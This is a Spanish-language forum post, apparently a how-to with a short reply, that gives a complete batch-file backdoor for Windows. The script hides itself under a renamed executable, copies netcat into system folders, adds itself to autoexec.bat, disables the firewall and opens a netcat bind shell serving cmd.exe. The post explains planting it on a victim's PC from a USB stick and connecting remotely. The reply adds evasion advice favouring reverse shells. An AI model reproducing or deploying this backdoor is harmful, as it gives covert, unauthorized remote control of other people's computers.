Compilamos el siguiente codigo con Bat2Exe PRO y elegimos la opción "Start Invisible (NO CONSOLE window)" En el codigo cambiamos "Backdoor.exe" por cualquier nombre porque sino sería muy obio y en "3500" escribimos el puerto que quieramos.

@echo off
IF exist %windir%\[i]Backdoor.exe[/i] goto :on
copy /y [i]Backdoor.exe[/i] %windir%
copy /y nc.exe %windir%\System32
echo start %windir%\[i]Backdoor.exe[/i]>>autoexec.bat
:on
netsh firewall set opmode mode=disable
nc -L -d -e cmd.exe -p [b]3500[/b]
pause>nul

Para acceder a la PC que tiene instalado en Backdoor escribimos en CMD:

nc -vv IPvictima PUERTO


Para instalar el Backdoor en la PC de la victima copiamos nuetro backdoor compilado y el archivo nc.exe (que una version reducida del NetCat que se puede descargar de este foro) a un Pendrive y iniciamos el Backdoor.exe, este se copiara a C:\Windows\ porque es una ubicación facíl de localizar y donde ninguna persona normal miraría y el NetCat debe estar en System32 para que se abra desde CMD al escribir nc.

IMPORTANTE: en nuestra pc en System32 tambien tenemos que tener el archivo nc.exe

si casi todas las versiones de netcat son detectadas . hacer una shell inversa con cualquier lenguaje de programacion es sencillo y es mucho mas indetectable xD.

ademas eso de desactivar  por consola a el firewall no funciona amenos que se tengan permisos de admin